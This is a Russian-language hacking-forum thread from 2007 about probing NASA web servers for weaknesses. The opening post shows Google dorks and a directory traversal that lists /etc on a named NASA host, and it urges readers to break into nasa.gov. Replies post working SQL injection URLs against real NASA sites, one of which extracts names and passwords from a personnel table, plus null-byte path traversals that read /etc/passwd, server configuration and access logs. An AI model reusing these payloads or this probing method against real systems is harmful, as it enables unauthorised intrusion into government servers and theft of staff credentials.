Иследования Серверов Nasa.gov

Discussion in 'Уязвимости' started by m0liver, 7 May 2007.

  1. m0liver

    m0liver Member

    Joined:
    28 Apr 2007
    Messages:
    0
    Likes Received:
    11
    Reputations:
    8
    И так друг мой хочу представить тебе придставить не глубокий анализ серверов NASA.
    Головной целю не было зламать основной сервер nasa ето глупо и на 99% не реально
    я хотел показать что сервера NASA очень уязвимы для хакерских атак.
    Ну что начнём
    иследования..... Хочу сразу сказать что без моего любимого google ничего бы не было
    так что спасибо за то что ты есть!
    Первый запрос который я ввёл был site:nasa.gov
    гугл сразу ответил что нашол около 6 610 000 ухты ну что будет над чем посидет ;)
    Ну что поехали дальше меня интересовало есть ли на сервере cgi скрипты соотвецтвено
    site:nasa.gov filetype:cgi так их тоже многа что говорит о возможности проверки на дыры.
    site:nasa.gov filetype:cgi .txt .exe .pdf ну и тут меня ожидал облом:(
    Ничего интересного небыло.Ну нечего идём дальше так дальше мне
    пришло в голову проверить Perl скрипти на уязвимости в инклудинге меня сразу превлекла
    ссылка:
    http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?dc8+Year=1998+Month=August+Day=236

    несколько експерементов над скриптом я обнаружыл

    http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?dc8

    скрипт выдал ошыбку:

    Failed opendir /server/ftp/pub/browse/camex3/lase: No such file or directory

    значит скрипт читает директории... Я попробывал вот так:

    http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?../../../../../../../../../../../../etc

    но на минуту меня ожыдало розчерования:(
    Вместо листинга файлов etc мне выдало страничку без картинок:( Но открывши сорцы
    документа я увидел нечто такого:

    <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.gfslock
    <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.initpipe
    <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.ioperms.lck
    <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.java
    <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.pwd.lock
    <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.xlv_labd_fifo
    ......


    Да мне показало страницу з etc файлами. Для проверки я вошол на фтп но сразу меня стретило привецтвия:

    220-
    *******************************************************************************
    WARNING! This is a U.S. Government computer.
    This system is for the use of authorized users only. By
    accessing and using the computer system you are consenting
    to system monitoring, including the monitoring of keystrokes.

    Unauthorized use of, or access to, this computer system may
    subject you to disciplinary action and criminal prosecution.

    *******************************************************************************
    220 GHRC: Public FTP Server ready...
    Пользователь (microwave.nsstc.nasa.gov:(none)):


    Переводить нету смысла брутить не стал пошол искать дальше что то интересное....

    SQL Inj come back....

    Ну чё з cgi & perl закончили идём смотреть php скрипты. И так запросим гугла вот так:
    site:nasa.gov filetype:php mysql error и что мы видим сразу первая страница и SQL ошыбка

    http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=455/
    MYSQL query failed: SELECT * FROM publications WHERE id=455/. MYSQL Error 1064: You
    have an error in your SQL syntax; check the manual that corresponds to your MySQL server
    version for the right syntax to use near '' at line 1

    Я не буду показывать как делать SQL inj ето глупо документаций по даной теме море!
    Напомню я лиш хочу показать уязвимые места сервера а не взламовать его!
    Дале проверел в ColdFusion скрипте была SQL из красивой одклаткой ощибки:
    http://www-robotics.jpl.nasa.gov/projects/projectImage.cfm?Project=1&Image=1'
    Дале я остановился и пошол спат:)
    The End
    Ну вот и всё наверно хотя даная проверка длилась не больше полтора часа и думаю багов
    ищё мгого и много так что дерзай и иди ламай nasa.gov и не забудь написать письмо з
    амерекоской тюряги:) Всё удачи.
     
    7 people like this.
  2. m0liver

    m0liver Member

    Joined:
    28 Apr 2007
    Messages:
    0
    Likes Received:
    11
    Reputations:
    8
    Ребята прошу строго не судить учтите ето моя первая статия. Если можна просто прокоментировать где я неправ или что я не правильно написал спасиба. ;)
     
    1 person likes this.
  3. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Code:
    http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
     
    1 person likes this.
  4. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=-455+union+select+1,2,3,4,5,6,7,8,version(),10,11,12/*

    5.0.22-max

    на статью не тянет.....
     
  5. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    И все бояны, уже запощены в разделе скулей, эту

    http://climate.gsfc.nasa.gov/personnel/viewperson.php?id=99'+union+select+1,2,concat(fname,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+personnel+limit+2,1/*

    я больше месяца назад нашел.
     
    1 person likes this.
  6. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Эта скуль инъекция существует со времен царя-гороха...

    1-ое... данные из БД никак не помогут ломануть сайт
    2-ое и основное... сайт находится не на насовском серваке....

    Т.Е. бесполезно... и ненужно... и не ты первый... я помню там 5-ый мускул... это не наса, а так... пежня...
     
  7. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    То что nasa- одна большая скуль известно по моему уже достаточно давно.
    Докозательством того что на nase багов очень много может служить освещение оных в журнале Хацкер)
     
  8. mysql

    mysql New Member

    Joined:
    8 May 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    password :
    _http://ilrs.gsfc.nasa.gov/cgi-bin/satellite_missions/select.cgi?order=by_name&sat_code=../../../../../../../etc/passwd%00&sat_name=GIOVE-A&sat_no=0505101&tab_id=general

    access log :
    _http://ilrs.gsfc.nasa.gov/cgi-bin/satellite_missions/select.cgi?order=by_name&sat_code=../../../../../../../etc/httpd/logs/cddis_access_log%00&sat_name=GIOVE-A&sat_no=0505101&tab_id=general

    http conf :
    _http://ilrs.gsfc.nasa.gov/cgi-bin/satellite_missions/select.cgi?order=by_name&sat_code=../../../../../../../etc/httpd/conf/httpd.conf%00&sat_name=GIOVE-A&sat_no=0505101&tab_id=general
     
  9. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Honeypots - имхо. Такие проекты не будут делать такие простые баги. . . .там ssh фильтруеться. там права узеранны сильно . . .
     
    #9 KPOT_f!nd, 9 May 2007
    Last edited: 9 May 2007
  10. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    там нету нечего, рут уже практически у всех каму не лень.
     
  11. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    http://forum.antichat.ru/showpost.php?p=277661&postcount=366